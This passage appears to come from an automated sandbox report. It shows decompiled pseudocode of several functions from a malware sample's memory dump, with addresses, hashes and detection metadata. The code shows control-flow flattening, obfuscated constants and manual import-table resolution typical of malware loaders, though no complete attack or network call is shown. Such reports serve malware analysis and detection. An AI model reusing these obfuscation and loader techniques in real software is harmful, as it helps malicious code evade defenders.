				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00218736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E0022360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E002250F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00217998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00227A0F(_t222);
											_t192 = E002178A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}

0x002196d7
0x002196de
0x002196e5
0x002196e7
0x002196e9
0x002196ea
0x002196ef
0x002196f7
0x00219700
0x00219707
0x0021970c
0x00219712
0x0021971a
0x00219722
0x0021972a
0x00219732
0x0021973a
0x00219742
0x0021974a
0x00219752
0x0021975a
0x00219762
0x0021976a
0x00219772
0x0021977b
0x00219780
0x00219786
0x0021978a
0x00219792
0x0021979a
0x0021979f
0x002197a7
0x002197af
0x002197b7
0x002197bf
0x002197c7
0x002197cf
0x002197d7
0x002197df
0x002197e7
0x002197ef
0x002197f7
0x002197ff
0x00219807
0x0021980f
0x00219817
0x0021981f
0x00219824
0x00219829
0x00219831
0x0021983d
0x00219842
0x0021984d
0x0021984e
0x00219852
0x0021985a
0x00219862
0x0021986a
0x00219875
0x00219879
0x00219883
0x00219890
0x00219898
0x002198a6
0x002198a9
0x002198ad
0x002198b5
0x002198bd
0x002198ca
0x002198ce
0x002198d6
0x002198de
0x002198e6
0x002198ee
0x002198f6
0x002198fe
0x00219906
0x00219910
0x00219910
0x00219922
0x002199d7
0x002199d8
0x002199dc
0x002199e1
0x002199e5
0x002199e7
0x002199e9
0x00000000
0x002199e9
0x00219928
0x0021992e
0x002199b9
0x002199be
0x002199c1
0x00000000
0x00219930
0x00219932
0x00219995
0x0021999a
0x0021999d
0x00000000
0x00219934
0x0021993a
0x00219a1d
0x00219940
0x00219946
0x00000000
0x0021994c
0x0021994c
0x00219953
0x00219972
0x00219977
0x0021997a
0x0021997f
0x00000000
0x0021997f
0x00219946
0x0021993a
0x00219932
0x0021992e
0x00219a26
0x00219a28
0x00219a2c
0x00219a2c
0x00219a36
0x00219a36
0x002199f0
0x002199f2
0x002199f7
0x002199fa
0x002199fa
0x002199fa
0x00000000

Strings

D\, xrefs: 002198D6
M^, xrefs: 00219712
&E, xrefs: 0021979F

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &E$D\$M^
API String ID: 0-182273106
Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction ID: a6208861ef102b8a5ca532489c97bc0da489ee691c27f89b385e98e1f8c8c0c1
Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction Fuzzy Hash: 4B8162715183819FD358CF25C88981BBBF0BFE8354F50891DF196862A1E3B6DA99CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0021153C, Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0021153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E0021E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00218697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E002160B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E002128CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}

0x0021153c
0x00211546
0x00211550
0x00211558
0x0021155d
0x00211565
0x0021156d
0x00211575
0x0021157d
0x00211585
0x0021158d
0x00211595
0x0021159d
0x002115a5
0x002115ad
0x002115b5
0x002115ba
0x002115bf
0x002115c7
0x002115cf
0x002115d7
0x002115df
0x002115e7
0x002115ef
0x002115f7
0x002115ff
0x00211604
0x00211609
0x00211611
0x00211619
0x00211626
0x0021162a
0x0021162c
0x00211634
0x0021163c
0x00211644
0x0021164c
0x00211654
0x0021165c
0x0021166a
0x0021166d
0x00211675
0x00211679
0x0021167d
0x00211685
0x0021168d
0x00211695
0x0021169d
0x0021169d
0x002116af
0x0021176c
0x0021177c
0x0021177f
0x00211785
0x0021178e
0x0021179c
0x002116b5
0x002116bb
0x00211733
0x0021173b
0x00000000
0x002116bd
0x002116c3
0x00211715
0x0021171a
0x0021171e
0x00211720
0x00000000
0x00211720
0x002116c5
0x002116cb
0x002116f6
0x002116fb
0x00211700
0x00211706
0x00000000
0x00211706
0x002116cd
0x002116d3
0x00000000
0x002116d9
0x002116d9
0x00000000
0x002116d9
0x002116d3
0x002116cb
0x002116c3
0x002116bb
0x002117a0
0x002117ab
0x002117ab
0x00211757
0x00211759
0x0021175e
0x0021175e
0x00000000

Strings

i^%4, xrefs: 002116C5
i^%4, xrefs: 00211720
Wx, xrefs: 002115EF

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Wx$i^%4$i^%4
API String ID: 0-1584002782
Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction ID: 55c40febfcf2ea8854c37e76df74b0f1fa80752c120581670cfaa3f2b7f57834
Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction Fuzzy Hash: D55167311183428FD398CE25C18945BBBE1BBE4718F140A1DF596922A0D7B4CAA9CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00227D03, Relevance: 3.9, Strings: 3, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00227D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x22ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00218736(_t119);
							 *0x22ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E002159D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x22ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00211132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0021E377);
					_t117 =  *0x22ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}

0x00227d03
0x00227d06
0x00227d10
0x00227d18
0x00227d20
0x00227d30
0x00227d35
0x00227d3b
0x00227d40
0x00227d45
0x00227d52
0x00227d5f
0x00227d6c
0x00227d74
0x00227d7c
0x00227d84
0x00227d8c
0x00227d94
0x00227d9c
0x00227da4
0x00227db0
0x00227db5
0x00227dbb
0x00227dc3
0x00227dcb
0x00227dd0
0x00227dd8
0x00227de0
0x00227ded
0x00227dee
0x00227df2
0x00227dfa
0x00227e02
0x00227e0a
0x00227e12
0x00227e1a
0x00227e22
0x00227e2f
0x00227e33
0x00227e3b
0x00227e43
0x00227e48
0x00227e50
0x00227e58
0x00227e66
0x00227e6a
0x00227e72
0x00227e78
0x00227e78
0x00227e82
0x00227eb7
0x00227eb8
0x00227ebb
0x00227ec3
0x00227ec5
0x00227ecd
0x00227ecf
0x00000000
0x00227ecf
0x00227e84
0x00227e86
0x00000000
0x00227e88
0x00227e88
0x00227e96
0x00227e9b
0x00227ea1
0x00227ea4
0x00227ea6
0x00000000
0x00227ea6
0x00227e86
0x00000000
0x00227e82
0x00227ed3
0x00227ef1
0x00227ef6
0x00227efc
0x00227eff
0x00227f01
0x00227f04
0x00227f04
0x00227f0d
0x00227f1a

Strings

W:, xrefs: 00227E3B
\v;8, xrefs: 00227D8C
sV, xrefs: 00227DC3

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: W:$\v;8$sV
API String ID: 0-492820393
Opcode ID: 79c8f4f697624a0eae517fc85008927ba1f25741c80e0040a540376d6bc233de
Instruction ID: d02212da535e3a8394d3df3f8a36b25d5d036058b046e993109adc8911b6b8d7
Opcode Fuzzy Hash: 79c8f4f697624a0eae517fc85008927ba1f25741c80e0040a540376d6bc233de
Instruction Fuzzy Hash: BA51887151C301AFD358CF25D88A85FBBE1FB88358F500A1DF4869A2A0D3B5CA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0021E05A, Relevance: 3.9, Strings: 3, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0021E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00224AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00216228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}

0x0021e05a
0x0021e05d
0x0021e065
0x0021e075
0x0021e07b
0x0021e07f
0x0021e081
0x0021e089
0x0021e091
0x0021e099
0x0021e0a1
0x0021e0af
0x0021e0b4
0x0021e0ba
0x0021e0c2
0x0021e0ca
0x0021e0d2
0x0021e0da
0x0021e0de
0x0021e0e3
0x0021e0e9
0x0021e0f1
0x0021e0f9
0x0021e101
0x0021e106
0x0021e10e
0x0021e11b
0x0021e11e
0x0021e122
0x0021e127
0x0021e12f
0x0021e137
0x0021e144
0x0021e148
0x0021e150
0x0021e15d
0x0021e15e
0x0021e162
0x0021e16a
0x0021e172
0x0021e180
0x0021e184
0x0021e18c
0x0021e194
0x0021e198
0x0021e19e
0x0021e21c
0x00000000
0x0021e1a6
0x0021e1a6
0x0021e215
0x0021e215
0x0021e21a
0x00000000
0x00000000
0x0021e1c1
0x0021e1c3
0x0021e1c7
0x0021e1c9
0x0021e227
0x00000000
0x0021e227
0x0021e1d0
0x0021e1d2
0x0021e20c
0x0021e20c
0x0021e20e
0x0021e210
0x00000000
0x00000000
0x0021e1d6
0x0021e1e0
0x0021e1e0
0x0021e1d8
0x0021e1d8
0x0021e1d8
0x0021e1f4
0x0021e1f9
0x0021e1fc
0x0021e1fe
0x00000000
0x0021e200
0x0021e200
0x0021e204
0x0021e207
0x0021e209
0x0021e209
0x00000000
0x0021e209
0x0021e1fe
0x0021e212
0x0021e212
0x0021e212
0x00000000
0x0021e215

Strings

&L, xrefs: 0021E0F1
TB7f, xrefs: 0021E0DA
;)m, xrefs: 0021E05D

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &L$;)m$TB7f
API String ID: 0-1597752287
Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction ID: b07bb77470c114f69dc3cb00a5fa97284765a0ee4b055b870b51594e0e5b774a
Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction Fuzzy Hash: 5F519A716083028FD718CF25D84591BBBE1FFE4358F104A1DF89996260D774DA99CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002261B8, Relevance: 3.8, Strings: 3, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E002261B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00227F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E0021D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}

0x002261b8
0x002261bb
0x002261ce
0x002261d2
0x002261d4
0x002261d9
0x002261db
0x002261e3
0x002261e8
0x002261f5
0x002261fd
0x00226205
0x0022620d
0x00226215
0x0022621d
0x00226225
0x00226229
0x0022622e
0x00226236
0x0022623e
0x00226246
0x0022624e
0x00226256
0x00226264
0x00226267
0x0022626b
0x00226270
0x00226275
0x0022627d
0x00226285
0x0022628d
0x00226295
0x0022629d
0x0022629d
0x002262ab
0x002262cb
0x00000000
0x002262ad
0x002262af
0x002262b9
0x002262ba
0x002262bf
0x002262c2
0x002262c7
0x00000000
0x002262c7
0x002262af
0x00000000
0x002262ab
0x002262df
0x002262e3
0x002262e8
0x002262eb
0x002262f0
0x002262f2
0x002262f2
0x00226303

Strings

]r, xrefs: 0022622E
x\d0, xrefs: 00226285
(, xrefs: 00226205

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ($]r$x\d0
API String ID: 0-3053701899
Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction ID: 94861696302ddcf0dddd00d34656f99dc0d63fce32a3b704dc1426ee37a07a5d
Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction Fuzzy Hash: 203188B28093529FD314DE54E84901BBBE0BBD4718F004E5DF899A62A1D379DE188B93

Uniqueness

Uniqueness Score: -1.00%

Function 00220B68, Relevance: 3.8, Strings: 3, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00220B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E0022889D(0x22c0b0, _v16,  *_t63);
				E0021C680(__ecx, _v40, _v20, 0x22c0b0, _v36, _a12, _t79, _a4);
				return E00222025(_v28, _t91, _v12, _v24);
			}

0x00220b70
0x00220b75
0x00220b78
0x00220b7b
0x00220b7c
0x00220b7d
0x00220b82
0x00220b92
0x00220b95
0x00220b9c
0x00220ba3
0x00220baa
0x00220bae
0x00220bb5
0x00220bbc
0x00220bc3
0x00220bca
0x00220bd1
0x00220bd8
0x00220bdf
0x00220be6
0x00220bed
0x00220bf4
0x00220bfb
0x00220c02
0x00220c09
0x00220c10
0x00220c17
0x00220c1e
0x00220c25
0x00220c2c
0x00220c33
0x00220c3a
0x00220c41
0x00220c48
0x00220c4c
0x00220c50
0x00220c57
0x00220c5e
0x00220c62
0x00220c69
0x00220c69
0x00220c70
0x00220c7e
0x00220c96
0x00220cb3

Strings

&S, xrefs: 00220C3A
`h, xrefs: 00220B82
hY, xrefs: 00220C02

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &S$`h$hY
API String ID: 0-860638928
Opcode ID: 29fc1394c51426dcfffae467042bd8c32b0bc4d3875e24553d754f0c2d82b12a
Instruction ID: 0a52e9f2fa97099f88dcbbec07ce7ef07984f8fc426341ab9666b0bee5ff9e00
Opcode Fuzzy Hash: 29fc1394c51426dcfffae467042bd8c32b0bc4d3875e24553d754f0c2d82b12a
Instruction Fuzzy Hash: 84312EB1C00219EBDF49CFA1C94A8EEBFB5FB44314F208198E41276260D3B95A65CF95

Uniqueness

Uniqueness Score: -1.00%

Function 10007F07, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007F07(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x10007f0c
0x10007f1c

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
